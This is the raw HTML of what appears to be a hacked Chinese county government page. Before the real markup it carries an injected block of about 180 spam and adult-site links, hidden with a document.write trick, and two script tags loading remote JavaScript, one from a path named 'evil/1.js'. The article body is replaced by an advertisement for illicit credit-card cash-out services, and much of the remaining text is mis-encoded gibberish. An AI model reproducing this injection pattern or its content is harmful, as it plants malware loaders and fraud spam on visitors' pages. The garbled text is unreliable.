<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
<a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a>
<a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a>
<a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a>
<a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a>
<a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a>
<a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a>
<a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a>
<a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a>
<a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a>
<a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a>
<a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a>
<a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a>
<a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a>
<a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a>
<a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a>
<a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a>
<a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a>
<a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a>
<a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a>
<a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a>
<a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a>
<a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a>
<a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a>
<a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a>
<a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a>
<a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a>
<a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a>
<a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a>
<a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a>
<a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a>
<a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a>
<a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a>
<a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a>
<a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a>
<a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a>
<a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a>
<a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a>
<a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a>
<a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a>
<a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a>
<a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a>
<a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a>
<a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a>
<a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a>
<a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a>
<a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a>
<a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a>
<a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a>
<a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a>
<a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a>
<a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a>
<a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a>
<a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a>
<a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a>
<a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a>
<a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a>
<a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a>
<a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a>
<a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a>
<a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a>
<a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a>
<a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a>
<a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a>
<a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a>
<a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a>
<a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a>
<a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a>
<a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a>
<a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a>
<a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a>
<a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a>
<a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a>
<a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a>
<a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a>
<a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a>
<a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a>
<a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a>
<a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a>
<a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a>
<a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a>
<a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a>
<a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a>
<a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a>
<a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a>
<a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a>
<a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a>
<a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a>
<a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a>
<a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a>
<a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a>
<a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a>
<a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a>
<a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a>
<a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a>
<a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a>
<a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a>
<a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a>
<a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a>
<a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a>
<a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a>
<a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a>
<a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a>
<a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a>
<a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a>
<a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a>
<a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a>
<a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a>
<a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a>
<a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a>
<a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a>
<a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a>
<a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a>
<a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a>
<a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a>
<a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a>
<a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a>
<script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script>
<!-------!><script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://www.aissxs.cc/1.js"></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<base target="_blank" />
<title>北京右安门信用卡取现 - Í©°ØÕþÎñ¹«¿ªÍø - Í©°ØÏØÈËÃñÕþ¸®Ö÷°ì - www.tongbai.gov.cn</title>
<meta name="keywords" content="Í©°Ø,Í©°ØÏØ,Í©°ØÕþ¸®,Í©°ØÏØÕþ¸®,Í©°ØÈËÃñÕþ¸®,ÄÏÑôÍ©°Ø,ºÓÄÏÍ©°Ø,Í©°ØÈË" />
<meta name="descRIption" content="Í©°ØÏØÈËÃñÕþ¸®ÍøÕ¾£¬½éÉÜÍ©°ØµØÇø¸Å¿ö¡¢Õþ¸®»ú¹¹¡¢ÕÐÉÌÐÅÏ¢µÈµÄ×ÛºÏÍøÕ¾¡£ÈȳÀµÄÍ©°ØÈË»¶ÓÄúµÄµ½À´£¡" />
<link href="http://tongbai.gov.cn/statics/css/old/style.css" rel="stylesheet" type="text/css">
<scRIpt language="JavaScript">
<!--
//¸Ä±äͼƬ´óС
function resizepic(thispic)
{
return true;
}
//ÎÞ¼¶Ëõ·ÅͼƬ´óС
function bbimg(o)
{
return true;
}
-->
</scRIpt>
<!--·ÖÏíCSSÑùʽµ÷ÓôúÂë BEGIN£¨´Ë´úÂë±ØÐ벿ÊðÔÚ</head>±ÕºÏ±ê¼Ç֮ǰ£©-->
<scRIpt type="text/javascRIpt">
var gwdshare = gwdshare || { version: "1.0", udata: "type=tools&uid=GWD-802542", pageFilter: "", jsLoaded: false };
(function () {
function async_load() {
var s = document.createElement('scRIpt');
s.type = 'text/javascRIpt';
s.async = true;
s.src = '//static.gridsumdissector.com/zheng_fen_xiang/scRIpts/gwdshareasync.min.js';
var x = document.getElementsByTagName('scRIpt'), y = x[x.length - 1];
y.parentNode.appendChild(s);
}
if (!gwdshare.jsLoaded) {
if (window.attachEvent) window.attachEvent('onload', async_load);
else window.addEventListener('load', async_load, false);
gwdshare.jsLoaded = true;
}
})();
</scRIpt>
<!--·ÖÏíCSSÑùʽµ÷ÓôúÂë END-->
</head>
<body bgcolor="#e6edf9">
<table width="960" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<base target="_blank" />
<title>Í©°ØÕþÎñ¹«¿ªÍø - Í©°ØÏØÈËÃñÕþ¸®Ö÷°ì - www.tongbai.gov.cn</title>
<meta name="keywords" content="Í©°Ø,Í©°ØÏØ,Í©°ØÕþ¸®,Í©°ØÏØÕþ¸®,Í©°ØÈËÃñÕþ¸®,ÄÏÑôÍ©°Ø,ºÓÄÏÍ©°Ø,Í©°ØÈË" />
<meta name="descRIption" content="Í©°ØÏØÈËÃñÕþ¸®ÍøÕ¾£¬½éÉÜÍ©°ØµØÇø¸Å¿ö¡¢Õþ¸®»ú¹¹¡¢ÕÐÉÌÐÅÏ¢µÈµÄ×ÛºÏÍøÕ¾¡£ÈȳÀµÄÍ©°ØÈË»¶ÓÄúµÄµ½À´£¡"
/>
<link href="http://tongbai.gov.cn/statics/css/old/style.css" rel="stylesheet" type="text/css">
<scRIpt type="text/javascRIpt" src="http://tongbai.gov.cn/statics/css/old/for_tab.js"></scRIpt>
</head>
<body>
<table width="1000" height="27" border="0" align="center" cellpadding="0" cellspacing="0" background="http://tongbai.gov.cn/statics/css/old/topttbg.jpg">
<tr>
<td><table width="990" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>»¶ÓÄú·ÃÎÊÍ©°ØÏØÕþ¸®ÃÅ»§ÍøÕ¾£¡</td>
<td width="30" align="center"><img src="http://tongbai.gov.cn/statics/css/old/gov.gif" width="13" height="15" /></td>
<td width="100"><a href="http://www.gov.cn" target="_blank">ÖÐÑëÕþ¸®ÃÅ»§Íø</a></td>
<td width="30" align="center"><img src="http://tongbai.gov.cn/statics/css/old/gov.gif" width="13" height="15" /></td>
<td width="100"><a href="http://www.nanyang.gov.cn" target="_blank">ÄÏÑôÊÐÈËÃñÕþ¸®</a></td>
</tr>
</table></td>
</tr>
</table>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="http://tongbai.gov.cn/statics/css/old/topbg.jpg" width="1000" height="135" /></td>
</tr>
</table>
<table width="1000" height="35" border="0" align="center" cellpadding="0" cellspacing="0" background="http://tongbai.gov.cn/statics/css/old/menutopbg.jpg">
<tr>
<td><table width="990" border="0" align="center" cellpadding="0" cellspacing="0" class="amenu">
<tr>
<td width="90" align="center"><a href="/" target="_top">Ê×Ò³</a></td>
<td width="90" align="center"><a href="/html/tbgm/" target="_blank">Í©°Ø¸Åò</a></td>
<td width="90" align="center"><a href="/html/xxgkzn/" target="_blank">ÐÅÏ¢¹«¿ª</a></td>
<td width="90" align="center"><a href="/html/gmbs/" target="_blank">¹«¹²·þÎñ</a></td>
<td width="90" align="center"><a href="http://tongbai.gov.cn/index.php?m=content&c=index&a=lists&catid=280" target="_blank">½»Á÷»¥¶¯</a></td>
<td width="90" align="center"><a href="/html/xxgkml/" target="_blank">վȺµ¼º½</a></td>
<!--<td width="90" align="center"><a href="/html/flwj/" target="_blank">·¨¹æÎļþ</a></td>
<td width="90" align="center"><a href="/html/zfjd/" target="_blank">Ö´·¨¼à¶½</a></td>
<td width="90" align="center"><a href="/html/cxjs/" target="_blank">³ÇÏ罨Éè</a></td>
<td width="90" align="center"><a href="/html/zbtb/" target="_blank">ÕбêͶ±ê</a></td>-->
</tr>
</table></td>
</tr>
</table>
</body>
</html>
</td>
</tr>
</table>
<table width="1000" height="28" border="0" align="center" cellpadding="0" cellspacing="0" class="top5" style="background-image:url(http://tongbai.gov.cn/statics/css/old/dddh.jpg);">
<tr>
<td class="menu-dh" style="padding-left:30px;">½ñÈÕÍ©°Ø</td>
</tr>
</table>
<table width="1000" height="500" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td valign="top" class="gk_bg"><table width="680" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="20" align="center"></td>
</tr>
</tbody>
</table>
<!--startprint-->
<table width="950" height="50" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" class="topZ_tt">北京右安门信用卡取现|°Ù¼ö<!-- GWD SHARE BEGIN ¸±±êÌâºóÃæÉÏϼýͷʽ·ÖÏí´úÂë-->
<span id="gwdShareMainDiv" style="display:inline; float:left; margin-top:25px;">
<div id="gwdShare_win_4" style="width:100px;float: left;position: relative;">
<span class="gwdtitle" style="line-height:15px;">·ÖÏí</span>
<div id="gwdShareUpDown_div" class="gwdShareArrow"></div>
<div id="gwdShare_con_4" style="display: none;height:118px;">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÈËÃñ΢²©</span></a>
<a class="gwds_tsina gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÐÂÀË΢²©</span></a>
<a class="gwds_tqq gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÌÚѶ΢²©</span></a>
<span class="gwds_more gws_title_more"></span>
</div>
</div>
</div>
</span>
<!-- GWD SHARE END --></td>
</tr>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="20" align="center" class="gdggtop"></td>
</tr>
</tbody>
</table>
<table width="950" height="29" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffefdf">
<tr>
<td align="center" class="menu-zz">×÷Õߣº ¡¡ÎÄÕÂÀ´Ô´£º»·±£¾ÖÍøÕ¾ ¡¡Ê±¼ä£º2017-02-14 14:44:27</td>
</tr>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#edc486">
<tbody>
<tr>
<td height="5"></td>
</tr>
</tbody>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0" class="bottom_20 Top_05">
<tbody>
<tr>
<td height="30"><table width="900" height="100" border="0" align="center" cellpadding="0" cellspacing="0" class="bottom_20">
<tr>
<td valign="top" class="topZ_txt news_txt"><div style="height:20px;"></div>
<div><span style="font-family: ËÎÌå"><span style="font-size: 18px"><p> 北京右安门信用卡取现_☎¡¾159.21.65.06.98¡¿-【套现_取现_垫还_代还_养卡等业务!】欢迎来电咨询合作!谢谢!!!</p>
<p> <p>¡¡¡¡¾¡¹Ü½üÆÚ±»ÈËÅúÆÀ¡°Ì«°®·¢ÍÆÌØÁË¡±£¬µ±µØÊ±¼ä12ÔÂ4ÈÕ£¬ÃÀ¹úºòÈÎ×ÜÍ³ÌØÀÊÆÕÁ¬·¢6ÌõÍÆÌØ£¬Íþв¶Ô½«¹¤³§Ç¨ÍùËû¹úµÄÃÀ¹úÆóÒµÕ÷ÊÕ35%¹ØË°¡£</p>
<p>¡¡¡¡<strong>6ÌõÍÆÌØÁ¬ÆðÀ´ÈçÏ£º</strong></p>
<p>¡¡¡¡¡°ÃÀ¹ú½«»áʵʩ±¾ÖÊÐԵؼõÉÙ˰Êպ;¼Ã¹ÜÖÆ£¬µ«ÈκÎÀ뿪ÃÀ¹ú¡¢½â¹ÍÔ±¹¤¡¢ÔÚËû¹ú½¨¹¤³§¡¢È´Ïë°Ñ²úÆ·ÊÛ»ØÃÀ¹úµÄÆóÒµ£¬Èç¹ûÒÔΪËûÃDz»»áÊܳͷ££¬ÄÇËûÃÇ´ó´íÌØ´í£¡¶ÔÕâЩÏë´Ó¹úÍâÏòÃÀ¹ú»ØÊÛ²úÆ·µÄÆóÒµ£¬ÎÒÃǼ´½«Õ÷ÊÕ35%µÄ¹ØË°¡£ÕâÏî˰ÊÕ»áÈÃÀ뿪ÃÀ¹ú±äµÃºÜÄÑ£¬µ«ÕâЩÆóÒµ¿ÉÒÔÎÞ˰ÊÕ±ÚÀÝÔÚÃÀ¹úËùÓÐ50¸öÁª°îÖݼäÁ÷¶¯¡£ÕâÊÇÎÒ¸øÄãÃǵÄÊÂǰ¾¯¸æ£¬²»Òª·¸Õâô‘°º¹óµÄ´íÎ󒣡ÃÀ¹ú¿ªÒµÀ²£¡¡±</p>
<div align="center"><img src="http://photocdn.sohu.com/20161205/Img474931869.jpeg" alt="½«ÃÀ¹úÆóÒµÁôÔÚÃÀ¹úÊÇÌØÀÊÆÕÔÚ¾ºÑ¡Ê±ÆÚÌá³öµÄÖ÷Òª¿ÚºÅÖ®Ò»¡£¾ÍÔÚÉÏÖÜ£¬ÌØÀÊÆÕ˵·þ±¾Óû½«ÆäλÓÚÓ¡µÚ°²ÄÉÖݵŤ³§Ç¨ÍùÄ«Î÷¸çµÄ¿Õµ÷ÖÆÔìÉÌCarrier£¬ÔÚÓ¡µÚ°²ÄÉÖݱ£ÁôÔ¼1000¸ö¹¤×÷¸Úλ¡£" width="600" height="742" align="middle" border="1" /></div>
<div align="center"><img src="http://photocdn.sohu.com/20161205/Img474931872.jpeg" alt="ÌØÀÊÆÕÁ¬·¢6ÌõÍÆÌØ£ºÀ뿪ÃÀ¹úµÄ¹«Ë¾½«ÃæÁÙ35%¹ØË°" width="600" height="800" align="middle" border="1" /></div>
<p>¡¡¡¡½«ÃÀ¹úÆóÒµÁôÔÚÃÀ¹úÊÇÌØÀÊÆÕÔÚ¾ºÑ¡Ê±ÆÚÌá³öµÄÖ÷Òª¿ÚºÅÖ®Ò»¡£¾ÍÔÚÉÏÖÜ£¬ÌØÀÊÆÕ˵·þ±¾Óû½«ÆäλÓÚÓ¡µÚ°²ÄÉÖݵŤ³§Ç¨ÍùÄ«Î÷¸çµÄ¿Õµ÷ÖÆÔìÉÌCarrier£¬ÔÚÓ¡µÚ°²ÄÉÖݱ£ÁôÔ¼1000¸ö¹¤×÷¸Úλ¡£</p>
<p>¡¡¡¡µ«ÕâÏî½»Ò×»ùÓÚÓ¡µÚ°²ÄÉÖÝÕþ¸®³Ðŵ¸øÓè¸Ã¹«Ë¾700ÍòÃÀÔªµÄ¼õ˰ÓŻݡ£ÃñÖ÷µ³²ÎÒéÔ±²®Äᡤ É£µÂ˹¾ÍÅúÆÀµÀ£¬¡°Õ⿪ÁËÒ»¸öΣÏÕµÄÏÈÀý¡±£¬ÈÃÄÉ˰È˲¹Ìù´ó¹«Ë¾£¬ÒÔ¡°Çó¡±ËüÃDZ£ÁôÔÚÃÀ¹úµÄ¹¤×÷¸Úλ¡£</p><scRIpt type="text/javascRIpt">// <![CDATA[
media_span_url('http://www.thepaper.cn/newsDetail_forward_1573994')
//]]></scRIpt>
</p>
</span></span></td>
</tr>
</table></td>
</tr>
</tbody>
</table><!--endprint-->
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="5"></td>
</tr>
</tbody>
</table>
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
